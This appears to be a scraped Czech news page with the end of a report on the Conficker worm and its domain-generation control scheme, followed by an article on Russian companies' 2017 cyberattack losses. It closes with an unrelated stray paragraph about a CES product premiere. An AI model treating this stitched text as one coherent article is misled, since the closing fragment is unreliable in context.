Conficker využívá zranitelnosti operačního systému Windows. Pro tu už dávno existuje bezpečnostní záplata, ale jak je ze statistik zřejmé, s její instalací si velká část uživatelů hlavu neláme. Na konci dubna se dokonce ukázalo, že se tento nebezpečný červ uhnízdil v počítačích v bavorské jaderné elektrárně Gundremmingen. 

Autoři Confickera vybudovali po celém světě velkou síť infikovaných PC využitelných na libovolnou úlohu, poněvadž mohou díky viru ovládat počítače na dálku. Na jeho řízení použili autoři červa inovativní způsob. Každý den se vygenerují nové náhodné domény, kam se vir hlásí a žádá instrukce.

Tím prakticky bezpečnostním expertům znemožňují, aby mohli Confickera zcela vyřadit z provozu.

Důležité jsou aktualizace
Většina antivirových programů by si nicméně i s tou nejnovější verzí měla poradit. Pokud ne, mohou pomoci s jeho vystopováním nejrůznější on-line antivirové skenery. Ty jsou zpravidla k dispozici zadarmo.

Jak zajistit, aby se červ do počítače vůbec nedostal? Bezpečnostní experti důrazně doporučují nainstalovat do počítače všechny přístupné bezpečnostní aktualizace, které jsou dostupné přes systém automatických aktualizací nebo přes stránku Windows Update.


Hackeři připravili ruské podniky o 116 miliard rublů

26.12.2017 Novinky/Bezpečnost  Hacking
Ruské firmy přišly letos kvůli kybernetickým útokům přibližně o 116 miliard rublů (zhruba 43 miliard korun), ztráty kvůli hackerům hlásí každá pátá společnost. Vyplývá to z první podobné zprávy ruské Národní výzkumné finanční agentury.
Analytické finanční centrum provedlo v listopadu šetření mezi 500 firmami v osmi federálních okruzích země. Podle něj v Rusku letos následkem hackerských útoků přišel jeden podnik v průměru o téměř 300 000 rublů (přes 110 000 korun).

Ze zprávy dále vyplývá, že se s kybernetickými hrozbami setkala až polovina respondentů, a to především ve velkých podnicích, zhruba 60 procent vůči 46 až 47 procentům mezi středními a drobnými podnikateli. Nejvíce se firmy setkávají s počítačovými viry včetně vyděračských, s proniknutím do elektronické pošty a s přímými útoky na webové stránky.

Podniky riziko podceňují
Přestože většina dotázaných podnikatelů o kybernetických hrozbách povědomí má, až 60 procent z nich si myslí, že je risk vůči jejich firmě minimální. Podle Kirilla Smirnova z výzkumné agentury ruské podniky míru nebezpečí často podceňují a nejsou připraveny hrozbám čelit.

Bezmála 90 procent dotázaných uvedlo, že se v rámci bezpečnostních opatření spokojí pouze s antivirovým programem. Bezpečnostní opatření, která musí dodržovat všichni zaměstnanci firmy, má jen 47 procent respondentů. Přístup k internetu omezuje svým zaměstnancům 45 procent společností. Dvaadvacet procent dotázaných podniků uvedlo, že svým pracovníkům dovoluje instalovat do firemních počítačů jakékoliv programy.

Teoreticky by si však novinka mohla odbýt premiéru na veletrhu CES, který se bude konat již tradičně zkraje ledna v americkém Las Vegas. Na něm totiž výrobci pravidelně odhalují zajímavou elektroniku, která se na pultech obchodů objeví v nadcházejících měsících.